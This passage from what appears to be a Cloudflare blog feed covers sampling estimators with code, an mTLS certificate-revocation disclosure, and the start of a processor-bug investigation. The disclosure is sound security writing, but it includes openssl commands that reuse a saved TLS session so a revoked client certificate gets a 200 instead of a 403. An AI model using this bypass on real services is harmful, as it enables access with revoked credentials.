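<p>The SUM and COUNT estimators above translate directly into code. Here is a minimal sketch in Python (a hypothetical helper, using the weight form of the formulas):</p>

```python
def ht_estimates(sample):
    """Horvitz-Thompson estimates for a Poisson sample of (x, w) pairs,
    where w is the sample interval (weight) of each event.
    Returns (sum_est, sum_var, count_est, count_var)."""
    t  = sum(x * w for x, w in sample)                # SUM estimate
    vt = sum(x * x * w * (w - 1) for x, w in sample)  # variance of SUM
    c  = sum(w for _, w in sample)                    # COUNT estimate
    vc = sum(w * (w - 1) for _, w in sample)          # variance of COUNT
    return t, vt, c, vc

# Unsampled data (w = 1 everywhere) gives exact answers with zero variance:
print(ht_estimates([(5, 1), (7, 1)]))      # (12, 0, 2, 0)

# In a 1-in-100 sample, each kept event stands in for ~100 originals:
t, vt, c, vc = ht_estimates([(5, 100), (7, 100)])
print(t, c)                                # 1200 200
```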

For AVG we would use

$$\begin{align}
\widehat{\mu} &amp;= \frac{\widehat{T}}{N},\\
\widehat{V}(\widehat{\mu}) &amp;= \frac{\widehat{V}(\widehat{T})}{N^2},
\end{align}$$

if we could, but the original population size $N$ is not known: it is not stored anywhere, and it cannot be stored at all, because custom filtering at query time means the relevant population is only determined when the query runs. Plugging in $\widehat{C}$ instead of $N$ only partially works: it gives a valid estimator for the mean itself, but not for its variance, so the constructed confidence intervals are unusable.
<p></p>
In all cases the corresponding pair of estimates is used as the $\mu$ and $\sigma^2$ of a normal distribution (justified by the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem">central limit theorem</a>), and then the bounds for the confidence interval (of confidence level $\alpha$) are:

$$\Big( \mu - \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma, \quad \mu + \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma\Big).$$<p>We do not know $N$, but there is a workaround: simultaneous confidence intervals. Construct confidence intervals for SUM and COUNT independently, and then combine them into a confidence interval for AVG. This is known as the <a href="https://www.sciencedirect.com/topics/mathematics/bonferroni-method"><u>Bonferroni method</u></a>. It requires generating wider intervals for SUM and COUNT, each allotted half of the allowed error probability (e.g. 97.5% intervals to combine into a 95% interval for AVG). Here is a simplified visual representation; the actual estimator also has to account for the possibility of the orange area going below zero.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69Vvi2CHSW8Gew0TWHSndj/1489cfe1ff57df4e7e1ca3c31a8444a5/BLOG-2486_5.png" />
          </figure><p>In SQL, the estimators and confidence intervals look like this:</p>
            <pre><code>WITH sum(x * _sample_interval)                              AS t,
     sum(x * x * _sample_interval * (_sample_interval - 1)) AS vt,
     sum(_sample_interval)                                  AS c,
     sum(_sample_interval * (_sample_interval - 1))         AS vc,
     -- ClickHouse does not expose the erf⁻¹ function, so we precompute some magic numbers,
     -- (only for 95% confidence, will be different otherwise):
     --   1.959963984540054 = Φ⁻¹((1+0.950)/2) = √2 * erf⁻¹(0.950)
     --   2.241402727604945 = Φ⁻¹((1+0.975)/2) = √2 * erf⁻¹(0.975)
     1.959963984540054 * sqrt(vt) AS err950_t,
     1.959963984540054 * sqrt(vc) AS err950_c,
     2.241402727604945 * sqrt(vt) AS err975_t,
     2.241402727604945 * sqrt(vc) AS err975_c
SELECT t - err950_t AS lo_total,
       t            AS est_total,
       t + err950_t AS hi_total,
       c - err950_c AS lo_count,
       c            AS est_count,
       c + err950_c AS hi_count,
       (t - err975_t) / (c + err975_c) AS lo_average,
       t / c                           AS est_average,
       (t + err975_t) / (c - err975_c) AS hi_average
FROM ...</code></pre>
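<p>The hard-coded constants in the query can be cross-checked with Python's standard library, which does expose the inverse of the standard normal CDF:</p>

```python
from statistics import NormalDist

phi_inv = NormalDist().inv_cdf  # Φ⁻¹, inverse of the standard normal CDF

# The two "magic numbers" from the SQL above:
print(phi_inv((1 + 0.950) / 2))  # ≈ 1.959963984540054
print(phi_inv((1 + 0.975) / 2))  # ≈ 2.241402727604945
```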
            <p>Construct a confidence interval for each timeslot on the timeseries, and you get a confidence band, clearly showing the accuracy of the analytics. The figure below shows an example of such a band in shading around the line.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JEnnC6P4BhM8qB8J5yKqt/3635835967085f9b24f64a5731457ddc/BLOG-2486_6.png" />
          </figure>
    <div>
      <h3>Sampling is easy to screw up</h3>
      <a href="#sampling-is-easy-to-screw-up">
        
      </a>
    </div>
    <p>We started using confidence bands on our internal dashboards, and after a while noticed something scary: a systematic error! For one particular website the "total bytes served" estimate was higher than the true control value obtained from rollups, and the confidence bands were way off. See the figure below, where the true value (blue line) is outside the yellow confidence band at all times.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CHCyKyXqPMj8DnMpBUf3N/772fb61f02b79c59417f66d9dc0b5d19/BLOG-2486_7.png" />
          </figure><p>We checked the stored data for corruption, it was fine. We checked the math in the queries, it was fine. It was only after reading through the source code for all of the systems responsible for sampling that we found a candidate for the root cause.</p><p>We used simple random sampling everywhere, basically "tossing a coin" for each event, but in Logreceiver sampling was done differently. Instead of sampling <i>randomly</i> it would perform <i>systematic sampling</i> by picking events at equal intervals starting from the first one in the batch.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xUwjxdylG5ARlFlDtv1OC/76db68677b7ae072b0a065f59d82c6f2/BLOG-2486_8.png" />
          </figure><p>Why would that be a problem?</p>There are two reasons. The first is that we can no longer claim $\pi_{ij} = \pi_i \pi_j$, so the simplified variance estimator stops working and confidence intervals cannot be trusted. But even worse, the estimator for the total becomes biased. To understand exactly why, we wrote a short repro in Python:
<br /><p></p>
            <pre><code>import itertools

def take_every(src, period):
    for i, x in enumerate(src):
        if i % period == 0:
            yield x

pattern = [10, 1, 1, 1, 1, 1]
sample_interval = 10 # bad if it has common factors with len(pattern)
true_mean = sum(pattern) / len(pattern)

orig = itertools.cycle(pattern)
sample_size = 10000
sample = itertools.islice(take_every(orig, sample_interval), sample_size)

sample_mean = sum(sample) / sample_size

print(f"{true_mean=} {sample_mean=}")</code></pre>
            <p>After playing with different values for <code><b>pattern</b></code> and <code><b>sample_interval</b></code> in the code above, we realized where the bias was coming from.</p><p>Imagine a person opening a huge generated HTML page with many small/cached resources, such as icons. The first response will be big, immediately followed by a burst of small responses. If the website is not visited that much, responses will tend to end up all together at the start of a batch in Logfwdr. Logreceiver does not cut batches, only concatenates them. The first response remains first, so it always gets picked and skews the estimate up.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2WZUzqCwr2A6WgX1T5UE8z/7a2e08b611fb64e64a61e3d5c792fe23/BLOG-2486_9.png" />
          </figure><p>We checked the hypothesis against the raw unsampled data that we happened to have because that particular website was also using one of the <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a> products. We took all events in a given time range, and grouped them by cutting at gaps of at least one minute. In each group, we ranked all events by time and looked at the variable of interest (response size in bytes), and put it on a scatter plot against the rank inside the group.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2IXtqGkRjV0xs3wvwx609A/81e67736cacbccdd839c2177769ee4fe/BLOG-2486_10.png" />
          </figure><p>A clear pattern! The first response is much more likely to be larger than average.</p><p>We fixed the issue by making Logreceiver shuffle the data before sampling. As we rolled out the fix, the estimation and the true value converged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4TL1pKDLw7MA6yGMSCahJN/227cb22054e0e8fe65c7766aa6e4b541/BLOG-2486_11.png" />
          </figure><p>Now, after battle testing it for a while, we are confident the HT estimator is implemented properly and we are using the correct sampling process.</p>
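<p>The effect of the fix can be reproduced with a variation of the repro above: shuffling the data before systematic sampling removes the bias. This is a simplified sketch, not the actual Logreceiver code:</p>

```python
import random

random.seed(0)

pattern = [10, 1, 1, 1, 1, 1]   # one big response followed by small ones
stream = pattern * 10_000       # periodic "population" of 60,000 events
true_mean = sum(pattern) / len(pattern)            # 2.5

def systematic_mean(events, period):
    """Mean of a systematic sample: every `period`-th event from the start."""
    picked = events[::period]
    return sum(picked) / len(picked)

biased = systematic_mean(stream, 10)               # aligned with the pattern

shuffled = stream[:]
random.shuffle(shuffled)                           # the fix: shuffle first
fixed = systematic_mean(shuffled, 10)

print(f"{true_mean=} {biased=} {fixed=:.2f}")      # biased=4.0, fixed≈2.5
```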
    <div>
      <h3>Using Cloudflare's analytics APIs to query sampled data</h3>
      <a href="#using-cloudflares-analytics-apis-to-query-sampled-data">
        
      </a>
    </div>
    <p>We already power most of our analytics datasets with sampled data. For example, the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> exposes the <a href="https://developers.cloudflare.com/analytics/analytics-engine/sql-api/#sampling"><u>sample interval</u></a> in SQL, allowing our customers to build their own dashboards with confidence bands. In the GraphQL API, all of the data nodes that have "<a href="https://developers.cloudflare.com/analytics/graphql-api/sampling/#adaptive-sampling"><u>Adaptive</u></a>" in their name are based on sampled data, and the sample interval is exposed as a field there as well, though it is not possible to build confidence intervals from that alone. We are working on exposing confidence intervals in the GraphQL API, and as an experiment have added them to the count and edgeResponseBytes (sum) fields on the httpRequestsAdaptiveGroups nodes. This is available under <code><b>confidence(level: X)</b></code>.</p><p>Here is a sample GraphQL query:</p>
            <pre><code>query HTTPRequestsWithConfidence(
  $accountTag: string
  $zoneTag: string
  $datetimeStart: string
  $datetimeEnd: string
) {
  viewer {
    zones(filter: { zoneTag: $zoneTag }) {
      httpRequestsAdaptiveGroups(
        filter: {
          datetime_geq: $datetimeStart
          datetime_leq: $datetimeEnd
      }
      limit: 100
    ) {
      confidence(level: 0.95) {
        level
        count {
          estimate
          lower
          upper
          sampleSize
        }
        sum {
          edgeResponseBytes {
            estimate
            lower
            upper
            sampleSize
          }
        }
      }
    }
  }
}
</code></pre>
            <p>The query above asks for the estimates and the 95% confidence intervals for <code><b>SUM(edgeResponseBytes)</b></code> and <code><b>COUNT</b></code>. The results will also show the sample size, which is good to know: we rely on the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem"><u>central limit theorem</u></a> to build the confidence intervals, so small samples don't work very well.</p><p>Here is the response from this query:</p>
            <pre><code>{
  "data": {
    "viewer": {
      "zones": [
        {
          "httpRequestsAdaptiveGroups": [
            {
              "confidence": {
                "level": 0.95,
                "count": {
                  "estimate": 96947,
                  "lower": "96874.24",
                  "upper": "97019.76",
                  "sampleSize": 96294
                },
                "sum": {
                  "edgeResponseBytes": {
                    "estimate": 495797559,
                    "lower": "495262898.54",
                    "upper": "496332219.46",
                    "sampleSize": 96294
                  }
                }
              }
            }
          ]
        }
      ]
    }
  },
  "errors": null
}
</code></pre>
            <p>The response shows the estimated count is 96947, and we are 95% confident that the true count lies in the range 96874.24 to 97019.76. Similarly, the estimate and range for the sum of response bytes are provided.</p><p>The estimates are based on a sample size of 96294 rows, which is plenty for calculating good confidence intervals.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We have discussed what kept our data pipeline scalable and resilient despite doubling in size every 1.5 years, how the math works, and how it is easy to mess up. We are constantly working on better ways to keep the data pipeline, and the products based on it, useful to our customers. If you are interested in doing things like that and want to help us build a better Internet, check out our <a href="http://www.cloudflare.com/careers"><u>careers page</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[GraphQL]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Sampling]]></category>
            <guid isPermaLink="false">64DSvKdN853gq5Bx3Cyfij</guid>
            <dc:creator>Constantin Pan</dc:creator>
            <dc:creator>Jim Hawkridge</dc:creator>
        </item>
        <item>
            <title><![CDATA[mTLS client certificate revocation vulnerability with TLS Session Resumption]]></title>
            <link>https://blog.cloudflare.com/mtls-client-certificate-revocation-vulnerability-with-tls-session-resumption/</link>
            <pubDate>Mon, 03 Apr 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ This blog post outlines the root cause analysis and solution for a bug found in Cloudflare’s mTLS implementation ]]></description>
            <content:encoded><![CDATA[ <p></p><p>On December 16, 2022, Cloudflare discovered a bug where, in limited circumstances, some users with revoked certificates may not have been blocked by Cloudflare firewall settings. Specifically, Cloudflare’s <a href="https://developers.cloudflare.com/firewall/">Firewall Rules solution</a> did not block some users with revoked certificates from resuming a session via <a href="https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/">mutual transport layer security (mTLS)</a>, even if the customer had configured Firewall Rules to do so. This bug has been mitigated, and we have no evidence of this being exploited. We notified any customers that may have been impacted in an abundance of caution, so they can check their own logs to determine if an mTLS protected resource was accessed by entities holding a revoked certificate.</p>
    <div>
      <h3>What happened?</h3>
      <a href="#what-happened">
        
      </a>
    </div>
    <p>One of Cloudflare Firewall Rules’ features, introduced in March 2021, lets customers revoke or block a client certificate, preventing it from being used to authenticate and establish a session. For example, a customer may use Firewall Rules to protect a service by requiring clients to provide a client certificate through the mTLS authentication protocol. Customers could also revoke or disable a client certificate, after which it would no longer be able to be used to authenticate a party initiating an encrypted session via mTLS.</p><p>When Cloudflare receives traffic from an end user, a service at the edge is responsible for terminating the incoming TLS connection. From there, this service is <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/">a reverse proxy</a>, and it is responsible for acting as a bridge between the end user and various upstreams. Upstreams might include other services within Cloudflare such as Workers or Caching, or may travel through Cloudflare to an external server such as an origin hosting content. Sometimes, you may want to restrict access to an endpoint, ensuring that only authorized actors can access it. Using client certificates is a common way of authenticating users. This is referred to as <i>mutual TLS</i>, because both the server and client provide a certificate. When mTLS is enabled for a specific hostname, this service at the edge is responsible for parsing the incoming client certificate and converting that into metadata that is attached to HTTP requests that are forwarded to upstreams. The upstreams can process this metadata and make the decision whether the client is authorized or not.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2TvrmqDG2SgLoVONCkuao6/37eae4dafac44d112dcc4ca8bcfb4baf/image1-12.png" />
            
            </figure><p>Customers can use the Cloudflare dashboard to <a href="https://developers.cloudflare.com/ssl/client-certificates/revoke-client-certificate/">revoke existing client certificates</a>. Instead of immediately failing handshakes involving revoked client certificates, revocation is optionally enforced via Firewall Rules, which take effect at the HTTP request level. This leaves the decision to enforce revocation with the customer.</p><p>So how exactly does this service determine whether a client certificate is revoked?</p><p>When we see a client certificate presented as part of the TLS handshake, we store the entire certificate chain on the TLS connection. This means that for every HTTP request that is sent on the connection, the client certificate chain is available to the application. When we receive a request, we look at the following fields related to a client certificate chain:</p><ol><li><p>Leaf certificate Subject Key Identifier (SKI)</p></li><li><p>Leaf certificate Serial Number (SN)</p></li><li><p>Issuer certificate SKI</p></li><li><p>Issuer certificate SN</p></li></ol><p>Some of these values are used for upstream processing, but the issuer SKI and leaf certificate SN are used to query our internal data stores for revocation status. The data store indexes on an issuer SKI, and stores a collection of revoked leaf certificate serial numbers. If we find the leaf certificate in this collection, we set the relevant metadata for consumption in Firewall Rules.</p><p>But what does this have to do with TLS session resumption?</p><p>To explain this, let’s first discuss how session resumption works. At a high level, session resumption grants the ability for clients and servers to expedite the handshake process, saving both time and resources. The idea is that if a client and server successfully handshake, then future handshakes are more or less redundant, assuming nothing about the handshake needs to change at a fundamental level (e.g. 
cipher suite or TLS version).</p><p>Traditionally, there are two mechanisms for session resumption - session IDs and session tickets. In both cases, the TLS server will handle encrypting the context of the session, which is basically a snapshot of the acquired TLS state that is built up during the handshake process. <b>Session IDs</b> work in a stateful fashion, meaning that the server is responsible for saving this state, somewhere, and keying against the session ID. When a client provides a session ID in the client hello, the server checks to see if it has a corresponding session cached. If it does, then the handshake process is expedited and the cached session is restored. In contrast, <b>session tickets</b> work in a stateless fashion, meaning that the server has no need to store the encrypted session context. Instead, the server sends the client the encrypted session context (AKA a session ticket). In future handshakes, the client can send the session ticket in the client hello, which the server can decrypt in order to restore the session and expedite the handshake.</p><p>Recall that when a client presents a certificate, we store the certificate chain on the TLS connection. It was discovered that when sessions were resumed, the code to store the client certificate chain in application data did not run. As a result, we were left with an empty certificate chain, meaning we were unable to check the revocation status and pass this information to firewall rules for further processing.</p><p>To illustrate this, let's use an example where mTLS is used for api.example.com. Firewall Rules are configured to block revoked certificates, and all certificates are revoked. We can reconstruct the client certificate checking behavior using a two-step process. 
First we use OpenSSL's s_client to perform a handshake using the revoked certificate (recall that revocation has nothing to do with the success of the handshake - it only affects HTTP requests <i>on</i> the connection), and dump the session’s context into a "session.txt" file. We then issue an HTTP request on the connection, which fails with a 403 status code response because the certificate is revoked.</p>
            <pre><code>❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof  -sess_out session.txt | grep 'HTTP/1.1'
depth=2 C=IE, O=Baltimore, OU=CyberTrust, CN=Baltimore CyberTrust Root
verify return:1
depth=1 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
verify return:1
depth=0 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
verify return:1
HTTP/1.1 403 Forbidden
^C⏎</code></pre>
            <p>Now, if we reuse "session.txt" to perform session resumption and then issue an identical HTTP request, the request succeeds. This shouldn't happen. We should fail both requests because they both use the same revoked client certificate.</p>
            <pre><code>❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof -sess_in session.txt | grep 'HTTP/1.1'
HTTP/1.1 200 OK</code></pre>
            
    <div>
      <h3>How we addressed the problem</h3>
      <a href="#how-we-addressed-the-problem">
        
      </a>
    </div>
    <p>Upon realizing that session resumption led to the inability to properly check revocation status, our first reaction was to disable session resumption for all mTLS connections. This blocked the vulnerability immediately.</p><p>The next step was to figure out how to safely re-enable resumption for mTLS. To do so, we needed to remove the dependency on data stored within the TLS connection state. Instead, we can use an API call that grants access to the leaf certificate in both the resumed and non-resumed cases. Two pieces of information are necessary: the leaf certificate serial number and the issuer SKI. The issuer's SKI is actually included in the leaf certificate itself, as the Authority Key Identifier (AKI). Just as <code>X509_get0_subject_key_id</code> returns a certificate's SKI, <code>X509_get0_authority_key_id</code> returns its AKI.</p>
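<p>Conceptually, the lookup that now works for both fresh and resumed sessions can be sketched like this (a toy model with hypothetical key identifiers and serial numbers, not Cloudflare's implementation):</p>

```python
# Revocation store: indexed by the issuer's key identifier (readable from
# the leaf certificate as its AKI), mapping to revoked leaf serial numbers.
revoked_serials: dict[str, set[int]] = {
    "aa:bb:cc:dd": {0x1A2B3C, 0x4D5E6F},   # hypothetical issuer and serials
}

def is_revoked(authority_key_id: str, leaf_serial: int) -> bool:
    """Check a leaf certificate's revocation status. Both inputs come from
    the leaf certificate itself, so the check no longer depends on chain
    state that is absent on resumed sessions."""
    return leaf_serial in revoked_serials.get(authority_key_id, set())

print(is_revoked("aa:bb:cc:dd", 0x1A2B3C))   # True  -> enforce via Firewall Rules
print(is_revoked("aa:bb:cc:dd", 0x999999))   # False -> allow
```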
    <div>
      <h3>Detailed timeline</h3>
      <a href="#detailed-timeline">
        
      </a>
    </div>
    <p><i>All timestamps are in UTC</i></p><p>In March 2021 we introduced a new feature in Firewall Rules that allows customers to block traffic from revoked mTLS certificates.</p><p>2022-12-16 21:53 - Cloudflare discovers that the vulnerability resulted from a bug whereby certificate revocation status was not checked for session resumptions. Cloudflare begins working on a fix to disable session resumption for all mTLS connections to the edge.</p><p>2022-12-17 02:20 - Cloudflare validates the fix and starts to roll out a fix globally.</p><p>2022-12-17 21:07 - Rollout is complete, mitigating the vulnerability.</p><p>2023-01-12 16:40 - Cloudflare starts to roll out a fix that supports both session resumption and revocation.</p><p>2023-01-18 14:07 - Rollout is complete.</p><p>In conclusion: once Cloudflare identified the vulnerability, a remediation was put into place quickly. A fix that correctly supports session resumption and revocation has been fully rolled out as of 2023-01-18. After reviewing the logs, Cloudflare has not seen any evidence that this vulnerability has been exploited in the wild.</p>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">1c0CkT5im0RxAvfTT5PMiA</guid>
            <dc:creator>Rushil Mehra</dc:creator>
        </item>
        <item>
            <title><![CDATA[However improbable: The story of a processor bug]]></title>
            <link>https://blog.cloudflare.com/however-improbable-the-story-of-a-processor-bug/</link>
            <pubDate>Thu, 18 Jan 2018 12:06:48 GMT</pubDate>
            <description><![CDATA[ Processor problems have been in the news lately, due to the Meltdown and Spectre vulnerabilities. But generally, engineers writing software assume that computer hardware operates in a reliable, well-understood fashion, and that any problems lie on the software side of the software-hardware divide. ]]></description>
            <content:encoded><![CDATA[ <p>Processor problems have been in the news lately, due to the <a href="/meltdown-spectre-non-technical/">Meltdown and Spectre vulnerabilities</a>. But generally, engineers writing software assume that computer hardware operates in a reliable, well-understood fashion, and that any problems lie on the software side of the software-hardware divide. Modern processor chips routinely execute many billions of instructions in a second, so any erratic behaviour must be very hard to trigger, or it would quickly become obvious.</p><p>But sometimes that assumption of reliable processor hardware doesn’t hold. Last year at Cloudflare, we were affected by a bug in one of Intel’s processor models. Here’s the story of how we found we had a mysterious problem, and how we tracked down the cause.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/259H08ZlP34cvwO953wEbe/9dfefb01771e3aff180bde9186c3c319/Sherlock_holmes_pipe_hat-1.jpg" />
            
            </figure><p><a href="http://creativecommons.org/licenses/by-sa/3.0/">CC-BY-SA-3.0</a> <a href="https://commons.wikimedia.org/wiki/File:Sherlock_holmes_pipe_hat.jpg">image</a> by Alterego</p>
    <div>
      <h3>Prologue</h3>
      <a href="#prologue">
        
      </a>
    </div>
    <p>Back in February 2017, Cloudflare <a href="/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/">disclosed a security problem</a> which became known as Cloudbleed. The bug behind that incident lay in some code that ran on our servers to parse HTML. In certain cases involving invalid HTML, the parser would read data from a region of memory beyond the end of the buffer being parsed. The adjacent memory might contain other customers’ data, which would then be returned in the HTTP response, and the result was Cloudbleed.</p><p>But that wasn’t the only consequence of the bug. Sometimes it could lead to an invalid memory read, causing the NGINX process to crash, and we had metrics showing these crashes in the weeks leading up to the discovery of Cloudbleed. So one of the measures we took to prevent such a problem happening again was to require that every crash be investigated in detail.</p><p>We acted very swiftly to address Cloudbleed, and so ended the crashes due to that bug, but that did not stop all crashes. We set to work investigating these other crashes.</p>
    <div>
      <h3>Crash is not a technical term</h3>
      <a href="#crash-is-not-a-technical-term">
        
      </a>
    </div>
    <p>But what exactly does “crash” mean in this context? When a processor detects an attempt to access invalid memory (more precisely, an address without a valid page in the page tables), it signals a page fault to the operating system’s kernel. In the case of Linux, these page faults result in the delivery of a SIGSEGV signal to the relevant process (the name SIGSEGV derives from the historical Unix term “segmentation violation”, also known as a segmentation fault or segfault). The default behaviour for SIGSEGV is to terminate the process. It’s this abrupt termination that was one symptom of the Cloudbleed bug.</p><p>This possibility of invalid memory access and the resulting termination is mostly relevant to processes written in C or C++. Higher-level compiled languages, such as Go and JVM-based languages, use type systems which prevent the kind of low-level programming errors that can lead to accesses of invalid memory. Furthermore, such languages have sophisticated runtimes that take advantage of <a href="https://pdos.csail.mit.edu/6.828/2017/readings/appel-li.pdf">page faults for implementation tricks that make them more efficient</a> (a process can install a signal handler for SIGSEGV so that it does not get terminated, and instead can recover from the situation). And for interpreted languages such as Python, the interpreter checks that conditions leading to invalid memory accesses cannot occur. So unhandled SIGSEGV signals tend to be restricted to programming in C and C++.</p><p>SIGSEGV is not the only signal that indicates an error in a process and causes termination. We also saw process terminations due to SIGABRT and SIGILL, suggesting other kinds of bugs in our code.</p><p>If the only information we had about these terminated NGINX processes was the signal involved, investigating the causes would have been difficult. But there is another feature of Linux (and other Unix-derived operating systems) that provided a path forward: core dumps. 
A core dump is a file written by the operating system when a process is terminated abruptly. It records the full state of the process at the time it was terminated, allowing post-mortem debugging. The state recorded includes:</p><ul><li><p>The processor register values for all threads in the process (the values of some program variables will be held in registers)</p></li><li><p>The contents of the process’ conventional memory regions (giving the values of other program variables and heap data)</p></li><li><p>Descriptions of regions of memory that are read-only mappings of files, such as executables and shared libraries</p></li><li><p>Information associated with the signal that caused termination, such as the address of an attempted memory access that led to a SIGSEGV</p></li></ul><p>Because core dumps record all this state, their size depends upon the program involved, but they can be fairly large. Our NGINX core dumps are often several gigabytes.</p><p>Once a core dump has been recorded, it can be inspected using a debugging tool such as gdb. This allows the state from the core dump to be explored in terms of the original program source code, so that you can inquire about the program stack and contents of variables and the heap in a reasonably convenient manner.</p><p>A brief aside: Why are core dumps called core dumps? It’s a historical term that originated in the 1960s when the principal form of random access memory was <a href="https://en.wikipedia.org/wiki/Magnetic-core_memory">magnetic core memory</a>. At the time, the word core was used as a shorthand for memory, so “core dump” means a dump of the contents of memory.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DW66RVAAUllbxyW26n4oP/9fe72dacf0f67f9a8a79dd4c115ba62a/coremem-2.jpg" />
            
            </figure><p><a href="http://creativecommons.org/licenses/by-sa/3.0/">CC BY-SA 3.0</a> <a href="https://en.wikipedia.org/wiki/Magnetic-core_memory#/media/File:KL_CoreMemory.jpg">image</a> by Konstantin Lanzet</p>
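<p>The default termination behaviour described above is easy to observe from a supervising process. Here is a small sketch (Linux-only, deliberately crashing a forked child and inspecting its wait status):</p>

```python
import ctypes
import os
import signal

pid = os.fork()
if pid == 0:
    # Child: write through an unmapped address. The processor signals a
    # page fault, and the kernel delivers SIGSEGV, terminating the process.
    ctypes.memset(1, 0, 1)   # address 1 is never a valid mapping
    os._exit(0)              # not reached

# Parent: the wait status records which signal killed the child.
_, status = os.waitpid(pid, 0)
assert os.WIFSIGNALED(status)
print(signal.Signals(os.WTERMSIG(status)).name)  # SIGSEGV
```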
    <div>
      <h3>The game is afoot</h3>
      <a href="#the-game-is-afoot">
        
      </a>
    </div>
    <p>As we examined the core dumps, we were able to track some of them back to more bugs in our code. None of them leaked data as Cloudbleed had, or had other security implications for our customers. Some might have allowed an attacker to try to impact our service, but the core dumps suggested that the bugs were being triggered under innocuous conditions rather than attacks. We didn’t have to fix many such bugs before the number of core dumps being produced had dropped significantly.</p><p>But there were still some core dumps being produced on our servers — about one a day across our whole fleet of servers. And finding the root cause of these remaining ones proved more difficult.</p><p>We gradually began to suspect that these residual core dumps were not due to bugs in our code. These suspicions arose because we found cases where the state recorded in the core dump did not seem to be possible based on the program code (and in examining these cases, we didn’t rely on the C code, but looked at the machine code produced by the compiler, in case we were dealing with compiler bugs). At first, as we discussed these core dumps among the engineers at Cloudflare, there was some healthy scepticism about the idea that the cause might lie outside of our code, and there was at least one joke about <a href="https://www.computerworld.com/article/3171677/it-industry/computer-crash-may-be-due-to-forces-beyond-our-solar-system.html">cosmic rays</a>. But as we amassed more and more examples, it became clear that something unusual was going on. Finding yet another “mystery core dump”, as we had taken to calling them, became routine, although the details of these core dumps were diverse, and the code triggering them was spread throughout our code base. The common feature was their apparent impossibility.</p><p>There was no obvious pattern to the servers which produced these mystery core dumps. The sample size was not very big, but they seemed to be evenly spread across all our servers and datacenters, and no one server was struck twice. The probability that an individual server would get a mystery core dump seemed to be very low (about one per ten years of server uptime, assuming they were indeed equally likely for all our servers). But because of our large number of servers, we got a steady trickle.</p>
    <div>
      <h3>In quest of a solution</h3>
      <a href="#in-quest-of-a-solution">
        
      </a>
    </div>
    <p>The rate of mystery core dumps was low enough that it didn’t appreciably impact the service to our customers. But we were still committed to examining every core dump that occurred. Although we got better at recognizing these mystery core dumps, investigating and classifying them was a drain on engineering resources. We wanted to find the root cause and fix it. So we started to consider causes that seemed somewhat plausible:</p><p>We looked at hardware problems. Memory errors in particular are a real possibility. But our servers use ECC (Error-Correcting Code) memory which can detect, and in most cases correct, any memory errors that do occur. Furthermore, any memory errors should be recorded in the IPMI logs of the servers. We do see some memory errors on our server fleet, but they were not correlated with the core dumps.</p><p>If not memory errors, then could there be a problem with the processor hardware? We mostly use Intel Xeon processors, of various models. These have a good reputation for reliability, and while the rate of core dumps was low, it seemed like it might be too high to be attributed to processor errors. We searched for reports of similar issues, and asked on the grapevine, but didn’t hear about anything that seemed to match our issue.</p><p>While we were investigating, an <a href="https://lists.debian.org/debian-devel/2017/06/msg00308.html">issue with Intel Skylake processors</a> came to light. But at that time we did not have Skylake-based servers in production, and furthermore that issue related to particular code patterns that were not a common feature of our mystery core dumps.</p><p>Maybe the core dumps were being incorrectly recorded by the Linux kernel, so that a mundane crash due to a bug in our code ended up looking mysterious? But we didn’t see any patterns in the core dumps that pointed to something like this. 
Also, upon an unhandled SIGSEGV, the kernel generates a log line with a small amount of information about the cause, like this:</p>
            <pre><code>segfault at ffffffff810c644a ip 00005600af22884a sp 00007ffd771b9550 error 15 in nginx-fl[5600aeed2000+e09000]</code></pre>
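<p>The fields in that line are the faulting address, the instruction pointer, the stack pointer, and an error code. The error code follows the standard x86 page-fault bit layout; as an illustration (this little decoder is ours, not part of our tooling), the "error 15" above can be unpacked like this:</p>

```python
# Decode the "error N" field of a kernel segfault log line. The bit layout
# is the standard x86 page-fault error code (our illustration, not from
# Cloudflare's tooling).
PAGE_FAULT_BITS = [
    (1 << 0, "protection violation (page was present)"),
    (1 << 1, "write access"),
    (1 << 2, "user-mode access"),
    (1 << 3, "reserved bit set in a page-table entry"),
    (1 << 4, "instruction fetch"),
]

def decode_segfault_error(code):
    """Return the human-readable meaning of each set bit."""
    return [desc for bit, desc in PAGE_FAULT_BITS if code & bit]

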